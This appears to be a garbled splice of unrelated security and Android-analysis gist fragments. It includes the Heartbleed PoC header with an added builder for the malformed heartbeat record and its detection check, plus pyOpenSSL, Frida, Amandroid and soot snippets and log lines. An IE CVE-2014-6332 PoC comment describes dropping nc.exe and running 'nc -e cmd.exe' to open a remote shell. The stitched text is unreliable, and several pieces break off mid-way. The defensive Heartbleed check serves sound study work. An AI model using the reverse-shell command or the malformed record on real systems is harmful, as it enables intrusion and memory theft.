#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
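The gist above is cut off after its imports, so the interesting part, the heartbeat record it sends, is not on this page. The following is an added example, not Jared Stafford's code: it rebuilds the well-known malformed heartbeat request (an 8-byte record claiming a 0x4000-byte payload that is not present) and, on the receiving side, applies the length check that RFC 6520 requires and that OpenSSL 1.0.1g added. `build_heartbeat_record` and `heartbeat_overread` are names chosen here, and the record bytes are constructed inline from the TLS heartbeat format rather than taken from the PoC.

```python
import struct

# TLS record content type for heartbeat (RFC 6520) and the HeartbeatMessageType values.
CONTENT_TYPE_HEARTBEAT = 0x18
HB_REQUEST = 0x01
HB_RESPONSE = 0x02


def build_heartbeat_record(payload: bytes, claimed_len: int, version=(3, 2)) -> bytes:
    """Build one TLS heartbeat record.

    claimed_len is written into the payload_length field independently of
    len(payload), so a caller can deliberately lie about the payload size,
    which is exactly what the CVE-2014-0160 probe does.
    """
    body = struct.pack(">BH", HB_REQUEST, claimed_len) + payload
    header = struct.pack(">BBBH", CONTENT_TYPE_HEARTBEAT, version[0], version[1], len(body))
    return header + body


# Constructed example: 18 03 02 00 03 | 01 40 00
# header: heartbeat, TLS 1.1, record length 3; body: request, payload_length 0x4000, no payload.
MALICIOUS_RECORD = build_heartbeat_record(b"", 0x4000)

# Constructed well-formed request: 4-byte payload plus the 16 bytes of padding RFC 6520 requires.
BENIGN_RECORD = build_heartbeat_record(b"ping" + b"\x00" * 16, 4)


def heartbeat_overread(record: bytes) -> int:
    """Return how many bytes beyond the received body a vulnerable responder
    would copy into its reply; 0 means the record passes the RFC 6520 check.

    An unpatched OpenSSL (< 1.0.1g) trusted payload_length and memcpy'd that
    many bytes from the record buffer, leaking up to 64 KiB of process memory
    per request. The fixed code discards the message when
    1 + 2 + payload_length + 16 exceeds the record length.
    """
    if len(record) < 5:
        raise ValueError("short TLS record header")
    ctype, vmaj, vmin, rec_len = struct.unpack(">BBBH", record[:5])
    if ctype != CONTENT_TYPE_HEARTBEAT:
        raise ValueError("not a heartbeat record")
    body = record[5:5 + rec_len]
    if len(body) != rec_len or rec_len < 3:
        raise ValueError("truncated heartbeat body")
    hb_type, claimed = struct.unpack(">BH", body[:3])
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        raise ValueError("unknown heartbeat message type")
    # Bytes actually present after the 3-byte header (payload plus padding).
    present = rec_len - 3
    # Over-read is what the sender claimed minus what it actually delivered.
    return max(0, claimed - present)


def should_discard(record: bytes) -> bool:
    """The receiver-side check: drop any heartbeat whose claimed payload
    (plus the mandatory 16 bytes of padding) does not fit in the record."""
    _, _, _, rec_len = struct.unpack(">BBBH", record[:5])
    _, claimed = struct.unpack(">BH", record[5:8])
    return 1 + 2 + claimed + 16 > rec_len


if __name__ == "__main__":
    print("malicious record:", MALICIOUS_RECORD.hex())
    print("over-read bytes :", heartbeat_overread(MALICIOUS_RECORD))
    print("discard?        :", should_discard(MALICIOUS_RECORD), should_discard(BENIGN_RECORD))
```

The same `should_discard` predicate, applied to decrypted TLS records on a sensor, is the detection rule: a heartbeat whose `payload_length` cannot fit inside its own record never occurs in legitimate traffic.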
/*
 * Collin's Dynamic Dalvik Instrumentation Toolkit for Android
 * Collin Mulliner <collin[at]mulliner.org>
 *
 * (c) 2012,2013
 *
 * License: LGPL v2.1
 *
 */
# Path to your oh-my-zsh installation.
export ZSH=$HOME/.oh-my-zsh
# Set name of the theme to load.
# Look in ~/.oh-my-zsh/themes/
# Optionally, if you set this to "random", it'll load a random theme each
# time that oh-my-zsh is loaded.
ZSH_THEME="ys"
# Example aliases
I/dalvikvm( 705): Ljava/lang/Long;
I/dalvikvm( 705): Landroid/graphics/LightingColorFilter;
I/dalvikvm( 705): Landroid/os/StrictMode$LogStackTrace;
I/dalvikvm( 705): Landroid/net/Uri$Part;
I/dalvikvm( 705): Lcom/android/internal/app/AlertController$ButtonHandler;
I/dalvikvm( 705): Landroid/widget/QuickContactBadge$QueryHandler;
I/dalvikvm( 705): Ljava/security/KeyFactorySpi;
I/dalvikvm( 705): Landroid/util/StateSet;
I/dalvikvm( 705): Lcom/android/org/bouncycastle/asn1/x509/AlgorithmIdentifier;
I/dalvikvm( 705): Ljava/util/concurrent/Executors$DefaultThreadFactory;
import OpenSSL
from OpenSSL.crypto import *
# Assumes you've already generated client.cer.
# Extract the signer certificate from CERT.RSA (the PKCS#7 signature block in an APK's META-INF):
#   openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out cert.cer
cacert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('cert.cer', 'r').read())
pk = OpenSSL.crypto.PKey()
# 1024-bit RSA matches the original gist but is below current minimums; use 2048 or more for anything real.
pk.generate_key(OpenSSL.crypto.TYPE_RSA, 1024)
import org.sireum.util._
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.alir.reachingFactsAnalysis.AndroidReachingFactsAnalysisConfig
import org.sireum.jawa.util.Timer
import org.sireum.amandroid.security.apiMisuse.InterestingApiCollector
import org.sireum.amandroid.util.AndroidLibraryAPISummary
import org.sireum.amandroid.AppCenter
import org.sireum.jawa.alir.reachability.ReachabilityAnalysis
import org.sireum.jawa.JawaCodeSource
<html>
<head>
<!--
CVE-2014-6332 PoC to bypass IE Protected Mode if enabled (via localhost), then get a shell.
The PoC drops nc.exe, then executes "nc -e cmd.exe -n ip port".
'server_ip' and 'server_port' in the JavaScript below determine the connect-back target.
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)
script = session.create_script('''
Dalvik.perform(function () {
    var Activity = Dalvik.use("com.example.myapp.MyActivity");
    Activity.hookMe.overload("java.lang.String").implementation = function () {
        // 'args' is not defined in this scope (the hooked argument arrives as a function
        // parameter), and .call() takes the receiver as its first argument.
        // Commenting out this line avoids the crash.
        Activity.hookMe.overload("java.lang.String").call(args[0], "foo");
        return "foo";
    };
});
''')
// This results in an immediate crash.
The MIT License (MIT)
Copyright (c) 2015 David Weinstein
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
java -cp soot.jar:app-debug.apk soot.tools.CFGViewer --graph=BriefBlockGraph -src-prec apk -android-jars /home/xxx/android-sdks/platforms/ -process-dir app-debug.apk -f J -allow-phantom-refs |